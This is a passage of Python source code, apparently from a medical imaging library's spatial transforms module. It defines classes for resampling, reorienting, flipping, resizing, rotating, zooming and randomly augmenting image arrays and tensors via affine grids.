if (not isinstance(spatial_size, int) or spatial_size != -1) and spatial_size is not None:
spatial_rank = min(len(ensure_tuple(spatial_size)), 3)
src_affine = to_affine_nd(spatial_rank, src_affine)
dst_affine = to_affine_nd(spatial_rank, dst_affine) if dst_affine is not None else src_affine
dst_affine, *_ = convert_to_dst_type(dst_affine, dst_affine, dtype=torch.float32)
in_spatial_size = np.asarray(img.shape[1 : spatial_rank + 1])
if isinstance(spatial_size, int) and (spatial_size == -1):
spatial_size = in_spatial_size
elif spatial_size is None and spatial_rank > 1:
spatial_size, _ = compute_shape_offset(in_spatial_size, src_affine, dst_affine)
spatial_size = np.asarray(fall_back_tuple(ensure_tuple(spatial_size)[:spatial_rank], in_spatial_size))
if (
allclose(src_affine, dst_affine, atol=AFFINE_TOL)
and allclose(spatial_size, in_spatial_size)
or spatial_rank == 1
):
output_data, *_ = convert_to_dst_type(img, img, dtype=torch.float32)
return output_data, dst_affine
if has_nib and isinstance(img, np.ndarray):
spatial_ornt, dst_r = reorient_spatial_axes(img.shape[1 : spatial_rank + 1], src_affine, dst_affine)
if allclose(dst_r, dst_affine, atol=AFFINE_TOL) and allclose(spatial_size, in_spatial_size):
spatial_ornt[:, 0] += 1
spatial_ornt = np.concatenate([np.array([[0, 1]]), spatial_ornt])
img_ = nib.orientations.apply_orientation(img, spatial_ornt)
output_data, *_ = convert_to_dst_type(img_, img, dtype=torch.float32)
return output_data, dst_affine
try:
src_affine, *_ = convert_to_dst_type(src_affine, dst_affine)
if isinstance(src_affine, np.ndarray):
xform = np.linalg.solve(src_affine, dst_affine)
else:
xform = (
torch.linalg.solve(src_affine, dst_affine)
if pytorch_after(1, 8, 0)
else torch.solve(dst_affine, src_affine).solution
)
except (np.linalg.LinAlgError, RuntimeError) as e:
raise ValueError(f"src affine is not invertible: {src_affine}") from e
xform = to_affine_nd(spatial_rank, xform)
if allclose(xform, np.diag(np.ones(len(xform))), atol=AFFINE_TOL) and allclose(spatial_size, in_spatial_size):
output_data, *_ = convert_to_dst_type(img, img, dtype=torch.float32)
return output_data, dst_affine
_dtype = dtype or self.dtype or img.dtype
in_spatial_size = in_spatial_size.tolist()
chns, additional_dims = img.shape[0], img.shape[spatial_rank + 1 :] # beyond three spatial dims
# resample
img_ = convert_data_type(img, torch.Tensor, dtype=_dtype)[0]
xform = convert_to_dst_type(xform, img_)[0]
align_corners = self.align_corners if align_corners is None else align_corners
mode = mode or self.mode
padding_mode = padding_mode or self.padding_mode
if additional_dims:
xform_shape = [-1] + in_spatial_size
img_ = img_.reshape(xform_shape)
if align_corners:
_t_r = torch.diag(torch.ones(len(xform), dtype=xform.dtype, device=xform.device)) # type: ignore
for idx, d_dst in enumerate(spatial_size[:spatial_rank]):
_t_r[idx, -1] = (max(d_dst, 2) - 1.0) / 2.0
xform = xform @ _t_r
if not USE_COMPILED:
_t_l = normalize_transform(
in_spatial_size, xform.device, xform.dtype, align_corners=True # type: ignore
)
xform = _t_l @ xform # type: ignore
affine_xform = Affine(
affine=xform, spatial_size=spatial_size, norm_coords=False, image_only=True, dtype=_dtype
)
output_data = affine_xform(img_, mode=mode, padding_mode=padding_mode)
else:
affine_xform = AffineTransform(
normalized=False,
mode=mode,
padding_mode=padding_mode,
align_corners=align_corners,
reverse_indexing=True,
)
output_data = affine_xform(img_.unsqueeze(0), theta=xform, spatial_size=spatial_size).squeeze(0)
if additional_dims:
full_shape = (chns, *spatial_size, *additional_dims)
output_data = output_data.reshape(full_shape)
# output dtype float
output_data, *_ = convert_to_dst_type(output_data, img, dtype=torch.float32)
return output_data, dst_affine
class ResampleToMatch(SpatialResample):
def __call__( # type: ignore
self,
img: NdarrayOrTensor,
src_meta: Optional[Dict] = None,
dst_meta: Optional[Dict] = None,
mode: Union[GridSampleMode, str, None] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str, None] = GridSamplePadMode.BORDER,
align_corners: Optional[bool] = False,
dtype: DtypeLike = None,
):
if src_meta is None:
raise RuntimeError("`in_meta` is missing")
if dst_meta is None:
raise RuntimeError("`out_meta` is missing")
mode = mode or self.mode
padding_mode = padding_mode or self.padding_mode
align_corners = self.align_corners if align_corners is None else align_corners
dtype = dtype or self.dtype
src_affine = src_meta.get("affine")
dst_affine = dst_meta.get("affine")
img, updated_affine = super().__call__(
img=img,
src_affine=src_affine,
dst_affine=dst_affine,
spatial_size=dst_meta.get("spatial_shape"),
mode=mode,
padding_mode=padding_mode,
align_corners=align_corners,
dtype=dtype,
)
dst_meta = deepcopy(dst_meta)
dst_meta["affine"] = updated_affine
return img, dst_meta
class Spacing(Transform):
backend = SpatialResample.backend
def __init__(
self,
pixdim: Union[Sequence[float], float, np.ndarray],
diagonal: bool = False,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
align_corners: bool = False,
dtype: DtypeLike = np.float64,
image_only: bool = False,
) -> None:
self.pixdim = np.array(ensure_tuple(pixdim), dtype=np.float64)
self.diagonal = diagonal
self.image_only = image_only
self.sp_resample = SpatialResample(
mode=look_up_option(mode, GridSampleMode),
padding_mode=look_up_option(padding_mode, GridSamplePadMode),
align_corners=align_corners,
dtype=dtype,
)
def __call__(
self,
data_array: NdarrayOrTensor,
affine: Optional[NdarrayOrTensor] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
align_corners: Optional[bool] = None,
dtype: DtypeLike = None,
output_spatial_shape: Optional[Union[Sequence[int], np.ndarray, int]] = None,
) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor, NdarrayOrTensor]]:
sr = int(data_array.ndim - 1)
if sr <= 0:
raise ValueError("data_array must have at least one spatial dimension.")
if affine is None:
# default to identity
affine_np = affine = np.eye(sr + 1, dtype=np.float64)
affine_ = np.eye(sr + 1, dtype=np.float64)
else:
affine_np, *_ = convert_data_type(affine, np.ndarray)
affine_ = to_affine_nd(sr, affine_np)
out_d = self.pixdim[:sr]
if out_d.size < sr:
out_d = np.append(out_d, [1.0] * (sr - out_d.size))
# compute output affine, shape and offset
new_affine = zoom_affine(affine_, out_d, diagonal=self.diagonal)
output_shape, offset = compute_shape_offset(data_array.shape[1:], affine_, new_affine)
new_affine[:sr, -1] = offset[:sr]
output_data, new_affine = self.sp_resample(
data_array,
src_affine=affine,
dst_affine=new_affine,
spatial_size=list(output_shape) if output_spatial_shape is None else output_spatial_shape,
mode=mode,
padding_mode=padding_mode,
align_corners=align_corners,
dtype=dtype,
)
new_affine = to_affine_nd(affine_np, new_affine)
new_affine, *_ = convert_to_dst_type(src=new_affine, dst=affine, dtype=torch.float32)
if self.image_only:
return output_data
return output_data, affine, new_affine
class Orientation(Transform):
backend = [TransformBackends.NUMPY, TransformBackends.TORCH]
def __init__(
self,
axcodes: Optional[str] = None,
as_closest_canonical: bool = False,
labels: Optional[Sequence[Tuple[str, str]]] = tuple(zip("LPI", "RAS")),
image_only: bool = False,
) -> None:
if axcodes is None and not as_closest_canonical:
raise ValueError("Incompatible values: axcodes=None and as_closest_canonical=True.")
if axcodes is not None and as_closest_canonical:
warnings.warn("using as_closest_canonical=True, axcodes ignored.")
self.axcodes = axcodes
self.as_closest_canonical = as_closest_canonical
self.labels = labels
self.image_only = image_only
def __call__(
self, data_array: NdarrayOrTensor, affine: Optional[NdarrayOrTensor] = None
) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor, NdarrayOrTensor]]:
spatial_shape = data_array.shape[1:]
sr = len(spatial_shape)
if sr <= 0:
raise ValueError("data_array must have at least one spatial dimension.")
affine_: np.ndarray
if affine is None:
# default to identity
affine_np = affine = np.eye(sr + 1, dtype=np.float64)
affine_ = np.eye(sr + 1, dtype=np.float64)
else:
affine_np, *_ = convert_data_type(affine, np.ndarray)
affine_ = to_affine_nd(sr, affine_np)
src = nib.io_orientation(affine_)
if self.as_closest_canonical:
spatial_ornt = src
else:
if self.axcodes is None:
raise ValueError("Incompatible values: axcodes=None and as_closest_canonical=True.")
if sr < len(self.axcodes):
warnings.warn(
f"axcodes ('{self.axcodes}') length is smaller than the number of input spatial dimensions D={sr}.\n"
f"{self.__class__.__name__}: input spatial shape is {spatial_shape}, num. channels is {data_array.shape[0]},"
"please make sure the input is in the channel-first format."
)
dst = nib.orientations.axcodes2ornt(self.axcodes[:sr], labels=self.labels)
if len(dst) < sr:
raise ValueError(
f"axcodes must match data_array spatially, got axcodes={len(self.axcodes)}D data_array={sr}D"
)
spatial_ornt = nib.orientations.ornt_transform(src, dst)
new_affine = affine_ @ nib.orientations.inv_ornt_aff(spatial_ornt, spatial_shape)
_is_tensor = isinstance(data_array, torch.Tensor)
spatial_ornt[:, 0] += 1 # skip channel dim
spatial_ornt = np.concatenate([np.array([[0, 1]]), spatial_ornt])
axes = [ax for ax, flip in enumerate(spatial_ornt[:, 1]) if flip == -1]
if axes:
data_array = (
torch.flip(data_array, dims=axes) if _is_tensor else np.flip(data_array, axis=axes) # type: ignore
)
full_transpose = np.arange(len(data_array.shape))
full_transpose[: len(spatial_ornt)] = np.argsort(spatial_ornt[:, 0])
if not np.all(full_transpose == np.arange(len(data_array.shape))):
if _is_tensor:
data_array = data_array.permute(full_transpose.tolist()) # type: ignore
else:
data_array = data_array.transpose(full_transpose) # type: ignore
out, *_ = convert_to_dst_type(src=data_array, dst=data_array)
new_affine = to_affine_nd(affine_np, new_affine)
new_affine, *_ = convert_to_dst_type(src=new_affine, dst=affine, dtype=torch.float32)
if self.image_only:
return out
return out, affine, new_affine
class Flip(Transform):
backend = [TransformBackends.TORCH, TransformBackends.NUMPY]
def __init__(self, spatial_axis: Optional[Union[Sequence[int], int]] = None) -> None:
self.spatial_axis = spatial_axis
def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
if isinstance(img, np.ndarray):
return np.ascontiguousarray(np.flip(img, map_spatial_axes(img.ndim, self.spatial_axis)))
return torch.flip(img, map_spatial_axes(img.ndim, self.spatial_axis))
class Resize(Transform):
backend = [TransformBackends.TORCH]
def __init__(
self,
spatial_size: Union[Sequence[int], int],
size_mode: str = "all",
mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
align_corners: Optional[bool] = None,
) -> None:
self.size_mode = look_up_option(size_mode, ["all", "longest"])
self.spatial_size = spatial_size
self.mode: InterpolateMode = look_up_option(mode, InterpolateMode)
self.align_corners = align_corners
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[InterpolateMode, str]] = None,
align_corners: Optional[bool] = None,
) -> NdarrayOrTensor:
img_, *_ = convert_data_type(img, torch.Tensor, dtype=torch.float)
if self.size_mode == "all":
input_ndim = img_.ndim - 1 # spatial ndim
output_ndim = len(ensure_tuple(self.spatial_size))
if output_ndim > input_ndim:
input_shape = ensure_tuple_size(img_.shape, output_ndim + 1, 1)
img_ = img_.reshape(input_shape)
elif output_ndim < input_ndim:
raise ValueError(
"len(spatial_size) must be greater or equal to img spatial dimensions, "
f"got spatial_size={output_ndim} img={input_ndim}."
)
spatial_size_ = fall_back_tuple(self.spatial_size, img_.shape[1:])
else: # for the "longest" mode
img_size = img_.shape[1:]
if not isinstance(self.spatial_size, int):
raise ValueError("spatial_size must be an int number if size_mode is 'longest'.")
scale = self.spatial_size / max(img_size)
spatial_size_ = tuple(int(round(s * scale)) for s in img_size)
resized = torch.nn.functional.interpolate(
input=img_.unsqueeze(0),
size=spatial_size_,
mode=look_up_option(self.mode if mode is None else mode, InterpolateMode).value,
align_corners=self.align_corners if align_corners is None else align_corners,
)
out, *_ = convert_to_dst_type(resized.squeeze(0), img)
return out
class Rotate(Transform, ThreadUnsafe):
backend = [TransformBackends.TORCH]
def __init__(
self,
angle: Union[Sequence[float], float],
keep_size: bool = True,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
align_corners: bool = False,
dtype: Union[DtypeLike, torch.dtype] = np.float32,
) -> None:
self.angle = angle
self.keep_size = keep_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
self.align_corners = align_corners
self.dtype = dtype
self._rotation_matrix: Optional[NdarrayOrTensor] = None
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
align_corners: Optional[bool] = None,
dtype: Union[DtypeLike, torch.dtype] = None,
) -> NdarrayOrTensor:
_dtype = dtype or self.dtype or img.dtype
img_t, *_ = convert_data_type(img, torch.Tensor, dtype=_dtype)
im_shape = np.asarray(img_t.shape[1:]) # spatial dimensions
input_ndim = len(im_shape)
if input_ndim not in (2, 3):
raise ValueError(f"Unsupported img dimension: {input_ndim}, available options are [2, 3].")
_angle = ensure_tuple_rep(self.angle, 1 if input_ndim == 2 else 3)
transform = create_rotate(input_ndim, _angle)
shift = create_translate(input_ndim, ((im_shape - 1) / 2).tolist())
if self.keep_size:
output_shape = im_shape
else:
corners = np.asarray(np.meshgrid(*[(0, dim) for dim in im_shape], indexing="ij")).reshape(
(len(im_shape), -1)
)
corners = transform[:-1, :-1] @ corners # type: ignore
output_shape = np.asarray(corners.ptp(axis=1) + 0.5, dtype=int)
shift_1 = create_translate(input_ndim, (-(output_shape - 1) / 2).tolist())
transform = shift @ transform @ shift_1
transform_t, *_ = convert_to_dst_type(transform, img_t)
xform = AffineTransform(
normalized=False,
mode=look_up_option(mode or self.mode, GridSampleMode),
padding_mode=look_up_option(padding_mode or self.padding_mode, GridSamplePadMode),
align_corners=self.align_corners if align_corners is None else align_corners,
reverse_indexing=True,
)
output: torch.Tensor = xform(img_t.unsqueeze(0), transform_t, spatial_size=output_shape).float().squeeze(0)
self._rotation_matrix = transform
out: NdarrayOrTensor
out, *_ = convert_to_dst_type(output, dst=img, dtype=output.dtype)
return out
def get_rotation_matrix(self) -> Optional[NdarrayOrTensor]:
return self._rotation_matrix
class Zoom(Transform):
backend = [TransformBackends.TORCH]
def __init__(
self,
zoom: Union[Sequence[float], float],
mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
padding_mode: Union[NumpyPadMode, PytorchPadMode, str] = NumpyPadMode.EDGE,
align_corners: Optional[bool] = None,
keep_size: bool = True,
**kwargs,
) -> None:
self.zoom = zoom
self.mode: InterpolateMode = InterpolateMode(mode)
self.padding_mode = padding_mode
self.align_corners = align_corners
self.keep_size = keep_size
self.kwargs = kwargs
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[InterpolateMode, str]] = None,
padding_mode: Optional[Union[NumpyPadMode, PytorchPadMode, str]] = None,
align_corners: Optional[bool] = None,
) -> NdarrayOrTensor:
img_t, *_ = convert_data_type(img, torch.Tensor, dtype=torch.float32)
_zoom = ensure_tuple_rep(self.zoom, img.ndim - 1) # match the spatial image dim
zoomed: NdarrayOrTensor = torch.nn.functional.interpolate( # type: ignore
recompute_scale_factor=True,
input=img_t.unsqueeze(0),
scale_factor=list(_zoom),
mode=look_up_option(self.mode if mode is None else mode, InterpolateMode).value,
align_corners=self.align_corners if align_corners is None else align_corners,
)
zoomed = zoomed.squeeze(0)
if self.keep_size and not np.allclose(img_t.shape, zoomed.shape):
pad_vec = [(0, 0)] * len(img_t.shape)
slice_vec = [slice(None)] * len(img_t.shape)
for idx, (od, zd) in enumerate(zip(img_t.shape, zoomed.shape)):
diff = od - zd
half = abs(diff) // 2
if diff > 0: # need padding
pad_vec[idx] = (half, diff - half)
elif diff < 0: # need slicing
slice_vec[idx] = slice(half, half + od)
padder = Pad(pad_vec, padding_mode or self.padding_mode)
zoomed = padder(zoomed)
zoomed = zoomed[tuple(slice_vec)]
out, *_ = convert_to_dst_type(zoomed, dst=img)
return out
class Rotate90(Transform):
backend = [TransformBackends.TORCH, TransformBackends.NUMPY]
def __init__(self, k: int = 1, spatial_axes: Tuple[int, int] = (0, 1)) -> None:
self.k = k
spatial_axes_: Tuple[int, int] = ensure_tuple(spatial_axes) # type: ignore
if len(spatial_axes_) != 2:
raise ValueError("spatial_axes must be 2 int numbers to indicate the axes to rotate 90 degrees.")
self.spatial_axes = spatial_axes_
def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
rot90: Callable = torch.rot90 if isinstance(img, torch.Tensor) else np.rot90 # type: ignore
out: NdarrayOrTensor = rot90(img, self.k, map_spatial_axes(img.ndim, self.spatial_axes))
out, *_ = convert_data_type(out, dtype=img.dtype)
return out
class RandRotate90(RandomizableTransform):
backend = Rotate90.backend
def __init__(self, prob: float = 0.1, max_k: int = 3, spatial_axes: Tuple[int, int] = (0, 1)) -> None:
RandomizableTransform.__init__(self, prob)
self.max_k = max_k
self.spatial_axes = spatial_axes
self._rand_k = 0
def randomize(self, data: Optional[Any] = None) -> None:
super().randomize(None)
if not self._do_transform:
return None
self._rand_k = self.R.randint(self.max_k) + 1
def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
if randomize:
self.randomize()
if not self._do_transform:
return img
return Rotate90(self._rand_k, self.spatial_axes)(img)
class RandRotate(RandomizableTransform):
backend = Rotate.backend
def __init__(
self,
range_x: Union[Tuple[float, float], float] = 0.0,
range_y: Union[Tuple[float, float], float] = 0.0,
range_z: Union[Tuple[float, float], float] = 0.0,
prob: float = 0.1,
keep_size: bool = True,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
align_corners: bool = False,
dtype: Union[DtypeLike, torch.dtype] = np.float32,
) -> None:
RandomizableTransform.__init__(self, prob)
self.range_x = ensure_tuple(range_x)
if len(self.range_x) == 1:
self.range_x = tuple(sorted([-self.range_x[0], self.range_x[0]]))
self.range_y = ensure_tuple(range_y)
if len(self.range_y) == 1:
self.range_y = tuple(sorted([-self.range_y[0], self.range_y[0]]))
self.range_z = ensure_tuple(range_z)
if len(self.range_z) == 1:
self.range_z = tuple(sorted([-self.range_z[0], self.range_z[0]]))
self.keep_size = keep_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
self.align_corners = align_corners
self.dtype = dtype
self.x = 0.0
self.y = 0.0
self.z = 0.0
def randomize(self, data: Optional[Any] = None) -> None:
super().randomize(None)
if not self._do_transform:
return None
self.x = self.R.uniform(low=self.range_x[0], high=self.range_x[1])
self.y = self.R.uniform(low=self.range_y[0], high=self.range_y[1])
self.z = self.R.uniform(low=self.range_z[0], high=self.range_z[1])
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
align_corners: Optional[bool] = None,
dtype: Union[DtypeLike, torch.dtype] = None,
randomize: bool = True,
get_matrix: bool = False,
):
if randomize:
self.randomize()
if not self._do_transform:
return img
rotator = Rotate(
angle=self.x if img.ndim == 3 else (self.x, self.y, self.z),
keep_size=self.keep_size,
mode=look_up_option(mode or self.mode, GridSampleMode),
padding_mode=look_up_option(padding_mode or self.padding_mode, GridSamplePadMode),
align_corners=self.align_corners if align_corners is None else align_corners,
dtype=dtype or self.dtype or img.dtype,
)
img = rotator(img)
return (img, rotator.get_rotation_matrix()) if get_matrix else img
class RandFlip(RandomizableTransform):
backend = Flip.backend
def __init__(self, prob: float = 0.1, spatial_axis: Optional[Union[Sequence[int], int]] = None) -> None:
RandomizableTransform.__init__(self, prob)
self.flipper = Flip(spatial_axis=spatial_axis)
def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
if randomize:
self.randomize(None)
if not self._do_transform:
return img
return self.flipper(img)
class RandAxisFlip(RandomizableTransform):
backend = Flip.backend
def __init__(self, prob: float = 0.1) -> None:
RandomizableTransform.__init__(self, prob)
self._axis: Optional[int] = None
def randomize(self, data: NdarrayOrTensor) -> None:
super().randomize(None)
if not self._do_transform:
return None
self._axis = self.R.randint(data.ndim - 1)
def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
if randomize:
self.randomize(data=img)
if not self._do_transform:
return img
return Flip(spatial_axis=self._axis)(img)
class RandZoom(RandomizableTransform):
backend = Zoom.backend
def __init__(
self,
prob: float = 0.1,
min_zoom: Union[Sequence[float], float] = 0.9,
max_zoom: Union[Sequence[float], float] = 1.1,
mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
padding_mode: Union[NumpyPadMode, PytorchPadMode, str] = NumpyPadMode.EDGE,
align_corners: Optional[bool] = None,
keep_size: bool = True,
**kwargs,
) -> None:
RandomizableTransform.__init__(self, prob)
self.min_zoom = ensure_tuple(min_zoom)
self.max_zoom = ensure_tuple(max_zoom)
if len(self.min_zoom) != len(self.max_zoom):
raise AssertionError("min_zoom and max_zoom must have same length.")
self.mode: InterpolateMode = look_up_option(mode, InterpolateMode)
self.padding_mode = padding_mode
self.align_corners = align_corners
self.keep_size = keep_size
self.kwargs = kwargs
self._zoom: Sequence[float] = [1.0]
def randomize(self, img: NdarrayOrTensor) -> None:
super().randomize(None)
if not self._do_transform:
return None
self._zoom = [self.R.uniform(l, h) for l, h in zip(self.min_zoom, self.max_zoom)]
if len(self._zoom) == 1:
# to keep the spatial shape ratio, use same random zoom factor for all dims
self._zoom = ensure_tuple_rep(self._zoom[0], img.ndim - 1)
elif len(self._zoom) == 2 and img.ndim > 3:
# if 2 zoom factors provided for 3D data, use the first factor for H and W dims, second factor for D dim
self._zoom = ensure_tuple_rep(self._zoom[0], img.ndim - 2) + ensure_tuple(self._zoom[-1])
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[InterpolateMode, str]] = None,
padding_mode: Optional[Union[NumpyPadMode, PytorchPadMode, str]] = None,
align_corners: Optional[bool] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
# match the spatial image dim
if randomize:
self.randomize(img=img)
if not self._do_transform:
return img
return Zoom(
self._zoom,
keep_size=self.keep_size,
mode=look_up_option(mode or self.mode, InterpolateMode),
padding_mode=padding_mode or self.padding_mode,
align_corners=align_corners or self.align_corners,
**self.kwargs,
)(img)
class AffineGrid(Transform):
backend = [TransformBackends.TORCH, TransformBackends.NUMPY]
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
rotate_params: Optional[Union[Sequence[float], float]] = None,
shear_params: Optional[Union[Sequence[float], float]] = None,
translate_params: Optional[Union[Sequence[float], float]] = None,
scale_params: Optional[Union[Sequence[float], float]] = None,
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
dtype: DtypeLike = np.float32,
affine: Optional[NdarrayOrTensor] = None,
) -> None:
self.rotate_params = rotate_params
self.shear_params = shear_params
self.translate_params = translate_params
self.scale_params = scale_params
self.device = device
self.dtype = dtype
self.affine = affine
def __call__(
self, spatial_size: Optional[Sequence[int]] = None, grid: Optional[NdarrayOrTensor] = None
) -> Tuple[NdarrayOrTensor, NdarrayOrTensor]:
if grid is None: # create grid from spatial_size
if spatial_size is None:
raise ValueError("Incompatible values: grid=None and spatial_size=None.")
grid = create_grid(spatial_size, device=self.device, backend="torch", dtype=self.dtype)
_b = TransformBackends.TORCH if isinstance(grid, torch.Tensor) else TransformBackends.NUMPY
_device = grid.device if isinstance(grid, torch.Tensor) else self.device
affine: NdarrayOrTensor
if self.affine is None:
spatial_dims = len(grid.shape) - 1
affine = (
torch.eye(spatial_dims + 1, device=_device)
if _b == TransformBackends.TORCH
else np.eye(spatial_dims + 1)
)
if self.rotate_params:
affine = affine @ create_rotate(spatial_dims, self.rotate_params, device=_device, backend=_b)
if self.shear_params:
affine = affine @ create_shear(spatial_dims, self.shear_params, device=_device, backend=_b)
if self.translate_params:
affine = affine @ create_translate(spatial_dims, self.translate_params, device=_device, backend=_b)
if self.scale_params:
affine = affine @ create_scale(spatial_dims, self.scale_params, device=_device, backend=_b)
else:
affine = self.affine
grid, *_ = convert_data_type(grid, torch.Tensor, device=_device, dtype=self.dtype or grid.dtype)
affine, *_ = convert_to_dst_type(affine, grid)
grid = (affine @ grid.reshape((grid.shape[0], -1))).reshape([-1] + list(grid.shape[1:]))
return grid, affine
class RandAffineGrid(Randomizable, Transform):
backend = AffineGrid.backend
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
rotate_range: RandRange = None,
shear_range: RandRange = None,
translate_range: RandRange = None,
scale_range: RandRange = None,
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
) -> None:
self.rotate_range = ensure_tuple(rotate_range)
self.shear_range = ensure_tuple(shear_range)
self.translate_range = ensure_tuple(translate_range)
self.scale_range = ensure_tuple(scale_range)
self.rotate_params: Optional[List[float]] = None
self.shear_params: Optional[List[float]] = None
self.translate_params: Optional[List[float]] = None
self.scale_params: Optional[List[float]] = None
self.device = device
self.affine: Optional[NdarrayOrTensor] = None
def _get_rand_param(self, param_range, add_scalar: float = 0.0):
out_param = []
for f in param_range:
if issequenceiterable(f):
if len(f) != 2:
raise ValueError("If giving range as [min,max], should only have two elements per dim.")
out_param.append(self.R.uniform(f[0], f[1]) + add_scalar)
elif f is not None:
out_param.append(self.R.uniform(-f, f) + add_scalar)
return out_param
def randomize(self, data: Optional[Any] = None) -> None:
self.rotate_params = self._get_rand_param(self.rotate_range)
self.shear_params = self._get_rand_param(self.shear_range)
self.translate_params = self._get_rand_param(self.translate_range)
self.scale_params = self._get_rand_param(self.scale_range, 1.0)
def __call__(
self, spatial_size: Optional[Sequence[int]] = None, grid: Optional[NdarrayOrTensor] = None
) -> NdarrayOrTensor:
self.randomize()
affine_grid = AffineGrid(
rotate_params=self.rotate_params,
shear_params=self.shear_params,
translate_params=self.translate_params,
scale_params=self.scale_params,
device=self.device,
)
_grid: NdarrayOrTensor
_grid, self.affine = affine_grid(spatial_size, grid)
return _grid
def get_transformation_matrix(self) -> Optional[NdarrayOrTensor]:
return self.affine
class RandDeformGrid(Randomizable, Transform):
backend = [TransformBackends.TORCH]
def __init__(
self,
spacing: Union[Sequence[float], float],
magnitude_range: Tuple[float, float],
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
) -> None:
self.spacing = spacing
self.magnitude = magnitude_range
self.rand_mag = 1.0
self.as_tensor_output = as_tensor_output
self.random_offset: np.ndarray
self.device = device
def randomize(self, grid_size: Sequence[int]) -> None:
self.random_offset = self.R.normal(size=([len(grid_size)] + list(grid_size))).astype(np.float32, copy=False)
self.rand_mag = self.R.uniform(self.magnitude[0], self.magnitude[1])
def __call__(self, spatial_size: Sequence[int]):
self.spacing = fall_back_tuple(self.spacing, (1.0,) * len(spatial_size))
control_grid = create_control_grid(spatial_size, self.spacing, device=self.device, backend="torch")
self.randomize(control_grid.shape[1:])
_offset, *_ = convert_to_dst_type(self.rand_mag * self.random_offset, control_grid)
control_grid[: len(spatial_size)] += _offset
if not self.as_tensor_output:
control_grid, *_ = convert_data_type(control_grid, output_type=np.ndarray, dtype=np.float32)
return control_grid
class Resample(Transform):
backend = [TransformBackends.TORCH]
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
as_tensor_output: bool = True,
norm_coords: bool = True,
device: Optional[torch.device] = None,
dtype: DtypeLike = np.float64,
) -> None:
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
self.norm_coords = norm_coords
self.device = device
self.dtype = dtype
def __call__(
self,
img: NdarrayOrTensor,
grid: Optional[NdarrayOrTensor] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
dtype: DtypeLike = None,
) -> NdarrayOrTensor:
if grid is None:
raise ValueError("Unknown grid.")
_device = img.device if isinstance(img, torch.Tensor) else self.device
_dtype = dtype or self.dtype or img.dtype
img_t, *_ = convert_data_type(img, torch.Tensor, device=_device, dtype=_dtype)
grid_t = convert_to_dst_type(grid, img_t)[0]
if grid_t is grid: # copy if needed (convert_data_type converts to contiguous)
grid_t = grid_t.clone(memory_format=torch.contiguous_format)
sr = min(len(img_t.shape[1:]), 3)
if USE_COMPILED:
if self.norm_coords:
for i, dim in enumerate(img_t.shape[1 : 1 + sr]):
grid_t[i] = (max(dim, 2) / 2.0 - 0.5 + grid_t[i]) / grid_t[-1:]
grid_t = moveaxis(grid_t[:sr], 0, -1) # type: ignore
_padding_mode = self.padding_mode if padding_mode is None else padding_mode
_padding_mode = _padding_mode.value if isinstance(_padding_mode, GridSamplePadMode) else _padding_mode
bound = 1 if _padding_mode == "reflection" else _padding_mode
_interp_mode = self.mode if mode is None else mode
_interp_mode = _interp_mode.value if isinstance(_interp_mode, GridSampleMode) else _interp_mode
if _interp_mode == "bicubic":
interp = 3
elif _interp_mode == "bilinear":
interp = 1
else:
interp = _interp_mode # type: ignore
out = grid_pull(
img_t.unsqueeze(0), grid_t.unsqueeze(0), bound=bound, extrapolate=True, interpolation=interp
)[0]
else:
if self.norm_coords:
for i, dim in enumerate(img_t.shape[1 : 1 + sr]):
grid_t[i] = 2.0 / (max(2, dim) - 1.0) * grid_t[i] / grid_t[-1:]
index_ordering: List[int] = list(range(sr - 1, -1, -1))
grid_t = moveaxis(grid_t[index_ordering], 0, -1) # type: ignore
out = torch.nn.functional.grid_sample(
img_t.unsqueeze(0),
grid_t.unsqueeze(0),
mode=self.mode.value if mode is None else GridSampleMode(mode).value,
padding_mode=self.padding_mode.value if padding_mode is None else GridSamplePadMode(padding_mode).value,
align_corners=True,
)[0]
